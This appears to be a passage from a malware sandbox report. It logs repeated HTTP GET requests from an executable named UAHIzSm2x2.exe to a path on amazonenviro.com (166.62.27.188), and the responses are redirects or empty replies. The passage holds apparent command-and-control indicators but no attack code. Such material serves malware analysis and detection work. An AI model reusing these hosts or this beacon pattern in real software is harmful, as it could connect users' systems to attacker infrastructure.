                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:43.760250092 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:44.070542097 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:43 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:45.665513039 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:45.975619078 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:45 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:47.579757929 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:47.890016079 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:47 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:49.471590996 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:49.781872034 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:49 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:51.396368980 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:51.707931042 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:51 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:53.312959909 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:53.627576113 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:53 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:55.222234964 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:55.532463074 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:55 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:57.192383051 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:57.502397060 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:57 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:25:59.107225895 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:25:59.417500973 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:25:59 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:01.033447981 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:01.344388008 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:01 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:02.983891964 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:03.294997931 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:03 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:04.922523022 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:05.233359098 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:05 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:06.849942923 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:07.160624981 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:07 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:08.768636942 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:09.078969955 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:08 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>
                    Jan 14, 2025 08:26:10.706983089 CET | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    Jan 14, 2025 08:26:11.017462969 CET | 500 | IN | HTTP/1.1 301 Moved Permanently
                    Date: Tue, 14 Jan 2025 07:26:10 GMT
                    Server: Apache
                    Location: https://amazonenviro.com/245_Aiymwhpjxsg
                    Content-Length: 248
                    Keep-Alive: timeout=5
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=iso-8859-1
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://amazonenviro.com/245_Aiymwhpjxsg">here</a>.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.6 | 49718 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:10 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:10 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:10 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.6 | 49736 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:12 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:12 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:12 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.6 | 49748 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:14 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:14 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:14 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.6 | 49761 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:16 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:16 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:16 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.6 | 49777 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:18 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:18 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:18 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.6 | 49794 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:20 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:20 UTC225INHTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:20 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.6 | 49806 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:22 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:22 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:22 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.6 | 49824 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:24 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:24 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:24 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.6 | 49841 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:26 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:26 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:26 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.6 | 49856 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:28 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:28 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:28 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.6 | 49871 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:30 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:30 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:30 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.6 | 49881 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:32 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:32 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:32 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    12 | 192.168.2.6 | 49896 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:34 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:34 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:34 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    13 | 192.168.2.6 | 49909 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:35 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:36 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:36 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    14 | 192.168.2.6 | 49926 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:37 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:38 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:38 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    15 | 192.168.2.6 | 49941 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:39 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:40 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:40 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    16 | 192.168.2.6 | 49953 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:41 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:42 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:42 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    17 | 192.168.2.6 | 49966 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:43 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
                    Connection: Keep-Alive
                    Accept: */*
                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                    Host: amazonenviro.com
                    2025-01-14 07:24:44 UTC | 225 | IN | HTTP/1.1 200 OK
                    Date: Tue, 14 Jan 2025 07:24:44 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.33
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Vary: Accept-Encoding
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    18 | 192.168.2.6 | 49982 | 166.62.27.188 | 443 | 6228 | C:\Users\user\Desktop\UAHIzSm2x2.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2025-01-14 07:24:46 UTC | 165 | OUT | GET /245_Aiymwhpjxsg HTTP/1.1
